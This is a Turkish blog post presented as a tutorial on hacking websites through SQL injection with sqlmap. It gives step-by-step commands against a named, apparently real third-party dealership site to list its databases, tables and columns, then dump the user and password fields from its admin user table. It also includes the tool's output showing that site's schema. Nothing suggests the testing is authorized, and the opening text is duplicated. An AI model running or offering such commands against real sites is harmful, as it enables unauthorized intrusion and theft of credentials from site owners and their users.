Merhabalar ;
Bu yazımızda sizlere SQL İnjection açığı bulanan sitelerde veritabanı nasıl indirilir , admin paneline nasıl girilir bunlardan bahsedeceğiz .
SQLmap Nedir ?
Sqlmap pyhton dili ile yazılıp geliştirilmiş son derece yararlı ve işlevselliği yüksek olan bir araçtır .
Kullanımı kolaydır , karışık gibi gözüksede son derece kullanıcı dostu bir arayüze sahiptir .
Hemen SQLMap ile nasıl site hacklanır konusuna değinelim ;
Programızı açtıktan sonra ;
Programı İndirmek İçin öncelikle pyhton kuralım ve daha sonra http://sqlmap.org/ adresinden sqlmapı indirelim .
Bu kodu kullanarak hedef sitemizdeki databaselerin adlarını ve varlıklarını görmüş oluruz ;
'-T' komutunu verdikten sonra getirmesini istediğimiz tablonun içeriklerini isteriz ve sonuna '--columns' yazarak tablo içindeki colonları buluruz .
'-C' komutunu girdikten sonra çekmesini istemiş olduğumuz kolonu yazıyoruz ve daha sonra '--dump' komutu ile kolon içindeki bilgileri getiriyor .
Ve konumuzun resimli anlatımı ;
Ve Videolu Anlatım ;
Bu yazımızda sizlere SQL İnjection açığı bulanan sitelerde veritabanı nasıl indirilir , admin paneline nasıl girilir bunlardan bahsedeceğiz .
SQLmap Nedir ?
Sqlmap pyhton dili ile yazılıp geliştirilmiş son derece yararlı ve işlevselliği yüksek olan bir araçtır .
Kullanımı kolaydır , karışık gibi gözüksede son derece kullanıcı dostu bir arayüze sahiptir .
Hemen SQLMap ile nasıl site hacklanır konusuna değinelim ;
Programızı açtıktan sonra ;
Programı İndirmek İçin öncelikle pyhton kuralım ve daha sonra http://sqlmap.org/ adresinden sqlmapı indirelim .
sqlmap.py -u http://www.lada-voronezh.ru/complectation.php?id=167 --dbs
Bu kodu kullanarak hedef sitemizdeki databaselerin adlarını ve varlıklarını görmüş oluruz ;
[*] lada
sqlmap.py -u http://www.lada-voronezh.ru/complectation.php?id=167 -D lada --tables'--dbs' komutunu silerek '-D' yazarak tablolarını bulmak istediğimiz veritabanını yazarız , ve '--tables' komutunu ekleyerek seçtiğimiz veritabanının tablolarını bulmasını isteriz .
Database: lada
[23 tables]
+----------------+
| catalog |
| about |
| akcii |
| auth_groups |
| auth_users |
| avtokred |
| catalog_groups |
| config |
| contacts |
| credits |
| indexes |
| indexes_tmp |
| ip_address |
| ladafinance |
| main |
| market |
| modules |
| news |
| opinion |
| price |
| services |
| sessions |
| vtb |
+----------------+
sqlmap.py -u http://www.lada-voronezh.ru/complectation.php?id=167 -D lada -T auth_users --columns
'-T' komutunu verdikten sonra getirmesini istediğimiz tablonun içeriklerini isteriz ve sonuna '--columns' yazarak tablo içindeki colonları buluruz .
Database: lada
Table: auth_users
[10 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| show | enum('0','1') |
| user | varchar(255) |
| active | enum('0','1') |
| email | varchar(255) |
| id | int(30) unsigned |
| name | varchar(255) |
| parent | varchar(10) |
| passwd | varchar(255) |
| por | int(20) |
| super_user | enum('1','0') |
+------------+------------------+
sqlmap -u http://www.lada-voronezh.ru/complectation.php?id=167 -D lada -T auth_users -C user,passwd --dump
'-C' komutunu girdikten sonra çekmesini istemiş olduğumuz kolonu yazıyoruz ve daha sonra '--dump' komutu ile kolon içindeki bilgileri getiriyor .
Ve konumuzun resimli anlatımı ;
Ve Videolu Anlatım ;
0 yorum:
Yorum Gönder